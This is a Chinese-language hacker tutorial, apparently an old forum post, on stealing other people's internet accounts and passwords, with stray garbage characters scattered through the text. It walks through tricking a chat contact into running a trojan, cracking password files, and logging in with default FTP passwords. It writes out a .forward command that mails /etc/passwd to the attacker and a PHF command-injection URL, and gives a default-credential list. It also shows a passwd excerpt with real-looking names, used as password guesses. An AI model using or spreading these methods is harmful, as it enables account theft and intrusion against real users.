如何得到别人的上网帐号和密码,我在这里介绍几种弱智方法。6 f1 I; Y9 j4 o5 W& O
方案一:利用特洛伊木马得到帐号。必备工具:NTESPY、PWLVIEW。1 W' ]& [# U* Z1 A& O4 x
优点:只要对方运行了程序就有80%的成功率,而且不需要任何网络入侵知识,只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件,一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高,操作简单而且用不了多长时间是它最大的优点,只是......8 E( v, n6 x2 O, `- q
缺点:只有一个,那就是如何让对方乖乖的运行你的程序。
+ `5 E7 O( [3 K) C: D提示:先问清你的目标和你是不是在一个城市。
/ ?/ r' n$ k( x, W4 |( Y' N) T实战演戏:一天,我在X海聊天室里寻找目标,遇见了同在北京的色鹅丢丢。我上前打招呼:丢丢好呀。丢丢说:你好呀。我又说:XXXXXXX(客套话,先和他拉关系)对了,我拿到了一个新程序,要不要看看?丢丢说:好呀,寄给我吧。! b' |/ e0 r( k& }' F% T, [! O% G% j
哈哈,鱼上钩了!先把诱饵程序改个名,如改成readme之类的东东,然后和一些不相干的东西发过去,然后你让他先运行README。在这插一句,有一位大侠使用此法时,竟然把控制端程序和NETSPY的说明文件一起发了过去,真搞不懂他怎么想的。我对他说,你先运行README,是中文说明。丢丢说:好...咦,怎么没反映呀?(YEAH!)我又说:那你直接运行软件吧。丢丢说:好吧...不错...我说:明天见...开始干活,连上他的机子后,现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98,进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来,放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车,丢丢的上网帐号和密码就都显示出来了。而且以后如果他上网,NETSPY就会通知你,他就再也逃不出你的手掌心了。就算是他换了密码,你也能在2分钟内再把他搞定。
# z2 @% _4 q. t0 Z6 ?忠告:你用他的帐号上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。. ~2 f2 V7 B! B- z2 ]8 _! f
方案二:利用ISP的疏忽做文章举。例用工具:EMAILCRK或网络刺客- j v. u& p p. `* [9 Z) Q) ~' k
优点:没什么优点
- f0 N3 A* H1 I3 ~缺点:要具体情况具体对待,太麻烦- Q' k! `0 U2 M* t
提示:平时多多留神。& W1 W( ^+ v1 y7 w1 T
譬如,某个ISP给你开好了帐号,然后又画蛇添足的给你一个邮箱,地址是:你的帐号@xxx.net
( `; ?$ w) u6 |; [8 S x6 U密码和你的上网密码一样。也就是说,只要你能敲开邮箱的密码就一切OK了。* X; h: t1 P0 B8 r' m: ~! f2 _
运行EMAILCRK或网络刺客,套上字典后就等着。一般没有XX个小时搞不定,不成功的可能性很大,而且破解时还必须要上网。你的机子要是快可以开上三四个窗口,套上不同的字典一起破
$ p8 |3 E1 S. [) w6 B- j方案三:侵入邮局主机然后把PASS档抓回来,然后用JOHN或JACK套上字典开始破。0 C' o; `$ F/ B0 W9 \( v
优点:一次可以破出好多帐号,而且如果运气好还能拿到ROOT,这个主机就要归你控制了。而且破解时不用上网,可以好几台机子一起破。
9 ]" v* O2 D/ P! }缺点:对于初学者有一定困难,尤其是只想拿一个上网帐号这样做恐怕会得不偿失。而且被发现的可能性很大,情节严重且性质恶劣,一定要慎重对待。9 w6 N. k5 {7 O- _" Q. v( ~, R! z
由于介绍此类的教学文章比较多,我就不班门弄斧了。
' z& j5 R7 e% Y! h6 g9 g: @
! {+ N5 F, H# Q8 c! X; @哈哈,我来说说最简单的入侵方法。其实入侵大体的原理相同,主要是利用系统的漏洞(BUG)来做文章。 X1 R& L) V! y9 \9 \2 S4 p1 S
只不过有的网站漏洞难找有的好找而已。一个好的黑客,就是要能很快的发现漏洞并加以利用。下面我给大家举一个小栗子。3 F2 K* c- O2 `) X$ `4 b- e* N9 k3 N
有一天,我去XX热线申请主页,发现那里采用的是机器自动回信,信的大概格式如下:
& U; Z z, N3 g8 t6 K" A5 r/ y) [. o' {: O" S: y* W4 C
------------------------------ ?0 x( e6 ~5 ?: D: O, Y
) h# d6 ?& y' L. L
XXX,你好(XX是你在表格上填的名字)
# w0 |! [! {8 E" M9 X6 u你在XX热线的主页空间已开通/ l) D2 Y" A8 l4 l; m7 P" x. K
帐户名:XXX 密码:11
- n* E3 K- R" B8 R3 n-----------XX热线
c/ }1 v+ k; e" Y* @电话:XXXX-XXXXXXXX8 w3 e* i+ ^, s7 x
------------------------------; I& ], Y6 c" b$ t* ^; U
; a* T& A! { O& p' o好了,由于是机器回信,所以那里所有人的初始密码都是11,而且该热线要更改密码要TELNET到邮局主机去改,有许多网友并没有接触过如何T主机,所以他们使用的还是初始密码11。
6 C$ @& R9 Z' V开始干活了,打开FTP软件,输入XX热线的IP,密码11,然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看,先试试AAAA,。。。没成功,再换一个,AABB。。。还是不行。哈哈,这个用户名短,没准能行。输入AA。。。进去了。寄下用户名然后继续试,ABC。。。又成功了,看来没改密码的人很多呀。试几个就行了,现在,你已经拥有这些帐户的控制权了。2 f3 s! G/ L' D$ @3 A2 B& [9 T
上面的这个栗子很简单,一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱,而且还未必能成功。即使成功了,你不改它实在无趣,改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句,把这方面的精力放到全心全意为人民服务上去。实在不行就去聊天室,看谁不听话就炸他,同样很过瘾的!
% w3 {# E4 G* N$ R 9 i8 S$ B2 T/ @; H4 y
1 O y w& a3 x& B Z7 o8 ~6 ]; D 如何获得第一个帐号/ R: C" V3 L9 _5 t
+ _ D: u5 K2 {- }3 }0 Y5 e- y/ T! N
我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些黑客站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.) N" v3 b" a5 \7 A1 k/ b
# a, Y: Y# _# A& c确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x,做一个.foward文件传上去,在UNIX下的命令应该是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后给匿名用户写一封信,它会把PASSWD发给你。
% a0 C2 ]. Q6 ~$ l+ W7 E! ]; R* g( h, ]
如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用.3 T8 ]& N! f( {5 U% E$ [
0 U: C* |4 {; j# A" A1 ]( l以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-<
8 H ?0 Y2 {/ c; s6 \4 f8 W# V2 W' E/ z2 d' F0 P: ]4 G
还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!9 H# @7 V1 P# e
/ o& s8 m# e5 ^0 n很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:
G1 v" [8 l; A3 D$ Z- _ v. n8 w4 V0 X
帐号 密码
+ G6 k; j M- R% s) `----------- ----------------
, c2 I, _, J" Z: G( O+ ~root root
! k" T0 S/ x/ p4 Z$ J9 Esys sys/system/bin
! q( u+ j# |- h8 `8 q' bbin sys/bin$ r, B6 x% G6 k
mountfsys mountfsys$ O8 ]+ v) M8 |0 n
adm adm4 a |% i$ z5 f3 S- M" ^8 y! y
uucp uucp
+ Y G0 L7 W2 v8 ]nuucp anon3 b5 E" `' k4 {6 V8 ^
anon anon
. A, S$ H2 x& S" f2 guser user
+ S6 ?" N5 K$ B& o7 ngames games
/ q9 R5 v6 t; p( q# Minstall install, ]% y/ a1 N1 L6 p3 c( D
reboot 给 "command login" 用的
1 p1 }( M; E9 U0 Ndemo demo
: t2 p/ F+ f" l; j' C, aumountfsys umountfsys
: o0 T2 q7 a7 y0 c2 W- A4 psync sync
i3 Z) U9 X1 D1 X! T2 [3 m6 Kadmin admin
- b8 c- I0 R7 g6 y6 Z' d5 |guest guest
; G3 }$ e: J+ ~+ p: mdaemon daemon
" G+ W8 M0 H7 P________________________________________________________________
4 z( O$ C0 Q* g2 [# z, P4 h
3 Y" d0 V: N5 n: ^. O2 N有些管理员忘记把他们改掉,那你就发财了!
5 w) H7 h* i9 \) ~1 ^5 P3 ~
7 S% O9 M# _0 v o' P7 O( Z9 K另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.& `) b3 U! H1 q( ~ z
: k, m9 Y* h$ d$ S& r9 Z* H
只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:
. k- f3 x7 V+ X5 W ]! G4 s
' \" T) P- p: X* s% g.........
# r. `7 u5 W* \( n6 j2 I0 S0 {5 ~- w8 K1 U, r
xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
+ U* x4 e' z% a5 L
" m2 b" G# F" [/ tqingyuan:x:275:50::/usr/qingyuan:/bin/sh
7 [* y: n" |, P6 [+ J0 r; e. F
3 |; R1 M8 P- h. \' Jhjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh
4 v$ g/ R, m5 M" H: V; ?8 q) f* Y$ i! ~/ U2 |0 u# m- @
smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh7 t( H% t. P* J! V8 j* i; x
9 q- q, A# R5 C
kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh) G5 I: Z1 f6 q" c& n2 g- g( J' Y
6 s+ e- G4 A" u
brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh
9 o- v1 G7 E1 Y
/ T0 W+ r7 @$ _, ltide:x:301:50:Wang XinYi:/usr/tide:/bin/sh
- W2 E T* {& y. T& ^2 u/ @2 J2 F: o; A3 N2 V1 Z, ?% s& ?* p1 B
............
2 t- c8 @0 c( D$ ?) B+ w5 D) P
7 [$ ^* D9 j |: {' d5 R& j这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.9 V3 F5 j6 i6 Y8 _
; Y% S- R J+ {, x如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.! t3 W$ ~* a1 C& L' ?4 V6 o
& N0 Y( D2 k5 t, o1 ^2 W& Y
当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的.
/ Q5 k4 M, z' f1 B% ^4 O
9 Q( `9 T2 w8 Y6 D$ N1 x如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好.
! S ]" i& }; Y+ P; X& c! s0 [8 [2 R/ U$ B# b. W& D4 u J7 o
最后实在不行还有一种比较卑劣的手段,就是给该网站的网管写封信,想办法骗他执行特洛伊木马,然后再.......算了,不说了.! J& x) m8 | t. _& ?) N
& m) Y: }4 Y# L4 L你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我.$ a9 L# L3 ~( b6 T1 @0 |& Q
u8 q3 |, Z- D4 Z |